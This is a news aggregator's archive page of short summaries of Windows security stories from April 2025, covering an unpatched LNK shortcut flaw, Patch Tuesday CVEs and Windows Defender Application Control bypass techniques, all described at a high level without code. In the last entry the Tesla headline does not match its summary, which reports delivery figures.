security feature Archives

Winsage

April 30, 2025

Unpatched Windows Shortcut Vulnerability Let Attackers Execute Remote Code

Security researcher Nafiez has discovered a vulnerability in Windows LNK files that allows remote code execution without user interaction. Microsoft has chosen not to address this issue, stating it does not meet their security servicing criteria. The vulnerability exploits specific components of LNK files, enabling attackers to create malicious shortcuts that initiate silent network connections when a user accesses a folder containing them. The exploit involves manipulating the HasArguments flag, EnvironmentVariableDataBlock, and embedding UNC paths. Microsoft defends its inaction by citing the Mark of the Web (MOTW) feature as adequate protection, despite concerns from security experts about its effectiveness. Previous vulnerabilities in LNK files have been addressed by Microsoft, and the availability of proof-of-concept code raises fears of potential exploitation by malicious actors.

Winsage

April 27, 2025

New Security Warning After 1 Billion Windows Users Told Do Not Delete

Microsoft's recent security update for Windows has raised concerns among users due to the introduction of a new vulnerability. The update, intended to address the CVE-2025-21204 vulnerability, inadvertently created a folder named inetpub, which Microsoft claims is essential for user protection. Security researcher Kevin Beaumont has warned that this update has introduced a denial of service vulnerability that allows non-admin users to halt future Windows security updates. Microsoft has classified the issue as moderate in severity and suggested that deleting the inetpub symlink and retrying the update may resolve the problem. The report has been forwarded to the Windows security team for potential further action.

Winsage

April 20, 2025

587 Windows Vulnerabilities — A Microsoft Security Record Breaker

Microsoft has reported a record number of 1,360 security vulnerabilities for its products in 2024, marking an 11% increase from 2023. This includes 587 vulnerabilities in Windows (33 classified as critical) and 684 in Windows Server (43 classified as critical). The increase in reported vulnerabilities suggests that security researchers are effectively identifying weaknesses, and Microsoft has invested over a million dollars in bounties to encourage this. The proactive communication and remediation process during Patch Tuesday enhances security, indicating that Microsoft is committed to addressing vulnerabilities rather than being indifferent to user security.

Winsage

April 19, 2025

Microsoft is deprecating a ‘revolutionary’ virtualization-based security feature for older versions of Windows 11

Microsoft has announced the deprecation of Virtualization-based Security (VBS) enclaves, a feature introduced in July 2024, in Windows 11 23H2 and earlier versions, as well as in Windows Server 2022 and its predecessors. Support for VBS enclaves will continue in Windows Server 2025 and future versions. VBS enclaves were designed to create secure memory spaces using Microsoft's Hyper-V hypervisor, enhancing security for specific application components. The decision to phase out VBS enclaves may be influenced by the rapid development cycle of Windows 11. Users are expected to transition to newer releases as support for Windows 11 23H2 ends in November. Enterprise customers relying on VBS enclaves may face disruptions if the feature is completely removed.

Winsage

April 18, 2025

Microsoft makes Windows 11 24H2 more secure but not how you’d think

Microsoft is deprecating support for Virtualization-Based Security (VBS) enclaves in Windows 11 23H2 and earlier versions as it transitions users to Windows 11 24H2, which retains support for VBS enclaves. Windows 11 24H2 enhances security and is essential for developers to ensure their applications function correctly and securely. Windows 11 23H2 will reach the end of its support lifecycle on November 11, 2025, after which Microsoft will stop providing security updates. Users are encouraged to upgrade to Windows 11 24H2 to maintain access to security features and receive updates.

Tech Optimizer

April 16, 2025

Hackers find a way around built-in Windows protections

Windows Defender Application Control (WDAC) is a built-in security feature on Windows PCs that restricts the execution of unauthorized software by allowing only trusted applications. However, hackers have discovered multiple methods to bypass WDAC, exposing systems to malware and cyber threats. Techniques for bypassing WDAC include using Living-off-the-Land Binaries (LOLBins), DLL sideloading, and exploiting misconfigurations in WDAC policies. Attackers can execute unauthorized code without triggering alerts from traditional security solutions, enabling them to install ransomware or create backdoors. Microsoft operates a bug bounty program to address vulnerabilities in WDAC, but some bypass techniques remain unpatched for long periods. Users can mitigate risks by keeping Windows updated, being cautious with software downloads, and using strong antivirus software.

Winsage

April 13, 2025

Week in review: Microsoft patches exploited Windows CLFS 0-day, WinRAR MotW bypass flaw fixed

Microsoft addressed over 120 vulnerabilities during its April 2025 Patch Tuesday, including a critical zero-day vulnerability (CVE-2025-29824) that is actively exploited. WinRAR users are urged to update to version 7.11 due to a vulnerability (CVE-2025-31334) that allows attackers to bypass Windows' Mark of the Web security feature. Chief Information Security Officers (CISOs) are experiencing security platform fatigue due to the proliferation of multiple security tools. President Donald Trump signed an Executive Order revoking security clearances for Chris Krebs and his colleagues at SentinelOne. Cyber crisis simulations are becoming essential for organizational preparedness against evolving cyber threats. Fortinet has released patches for vulnerabilities, including a critical flaw (CVE-2024-48887) in FortiSwitch appliances. WhatsApp users should update their Windows client app to fix a vulnerability (CVE-2025-30401) that could allow harmful code execution. Kevin Serafin, CISO at Ecolab, discussed aligning security initiatives with business objectives. There is a rise in compromised large language model (LLM) attacks and risks associated with AI autonomy. New open-source tools like the YES3 Scanner and APTRS have been developed to enhance security capabilities. The cybersecurity job market remains strong, with increasing demand for skilled professionals.

Winsage

April 9, 2025

Patch Tuesday fixes an exploited bug, but not for Windows 10

Microsoft's Patch Tuesday updates addressed over 120 vulnerabilities, including one actively exploited flaw (CVE-2025-29824) and 11 critical issues. CVE-2025-29824 is an elevation of privilege vulnerability in the Windows Common Log File System Driver, targeted by the group Storm-2460 to deploy ransomware called PipeMagic, affecting victims in the US, Spain, Venezuela, and Saudi Arabia. This vulnerability has a CVSS score of 7.8 and allows attackers to escalate privileges due to a use-after-free flaw. Patches for Windows Server and Windows 11 have been released, but Windows 10 users are still awaiting a fix, with Microsoft promising updates soon. Among the critical vulnerabilities addressed, all allow for remote code execution (RCE). Notable vulnerabilities include: - CVE-2025-26670: LDAP Client RCE, Critical, CVSS 8.1 - CVE-2025-27752: Microsoft Excel RCE, Critical, CVSS 7.8 - CVE-2025-29791: Microsoft Excel RCE, Critical, CVSS 7.8 - CVE-2025-27745: Microsoft Office RCE, Critical, CVSS 7.8 - CVE-2025-27748: Microsoft Office RCE, Critical, CVSS 7.8 - CVE-2025-27749: Microsoft Office RCE, Critical, CVSS 7.8 - CVE-2025-27491: Windows Hyper-V RCE, Critical, CVSS 7.1 - CVE-2025-26663: Windows LDAP RCE, Critical, CVSS 8.1 - CVE-2025-27480: Windows RDP RCE, Critical, CVSS 8.1 - CVE-2025-27482: Windows RDP RCE, Critical, CVSS 8.1 - CVE-2025-26686: Windows TCP/IP RCE, Critical, CVSS 7.5 - CVE-2025-29809: Windows Kerberos Security Feature Bypass, Important, CVSS 7.1 Dustin Childs from ZDI noted that CVE-2025-29809 requires additional measures beyond standard patching. CVE-2025-26663 and CVE-2025-26670 are considered wormable, necessitating prompt updates, especially for networks exposing LDAP services. Adobe released over 50 fixes for vulnerabilities in products like Cold Fusion, After Effects, and Photoshop, with some issues in Cold Fusion classified as critical. AMD updated advisories regarding GPU access and various Ryzen AI software vulnerabilities.

Winsage

April 8, 2025

Report: EncryptHub moonlighting in vulnerability research

A new threat actor named EncryptHub, or SkorikARI, has been recognized by Microsoft for identifying two significant security vulnerabilities in Windows: a high-severity bypass of the Windows Mark of the Web security feature (CVE-2025-24061) and a medium-severity spoofing issue in Windows File Explorer (CVE-2025-24071). EncryptHub, based in Romania and of Ukrainian origin, has a background in vishing and ransomware attacks and shifted to vulnerability research due to financial difficulties and the threat of imprisonment. The KrakenLabs report notes EncryptHub's skill in identifying vulnerabilities but warns that his creations are not foolproof, and users following basic security protocols are likely to remain safe.

AppWizard

April 3, 2025

Tesla adds security feature to Android with latest software update

Wedbush analyst Dan Ives reported that Tesla delivered 336,681 vehicles in Q1 2025, falling short of Wall Street's forecast of 352,000 and whisper estimates around 350,000. Tesla attributed part of this underperformance to several weeks of production loss while ramping up the new Model Y. Ives described the performance as “a disaster on every metric” and emphasized that it represents a pivotal moment for CEO Elon Musk, who has been increasingly involved in U.S. government affairs, potentially affecting the brand negatively. Following the delivery report, Tesla's stock initially dropped over 5 percent but rebounded by 8 percent, currently trading up over 5 percent at 3.01. This recovery was linked to reports of Musk potentially stepping back from his role in the Department of Government Efficiency (DOGE). Ives expressed optimism about Tesla's future advancements in robotaxi technology and Full Self-Driving capabilities but cautioned that Musk needs to balance his responsibilities with DOGE and leading Tesla to avoid further crises.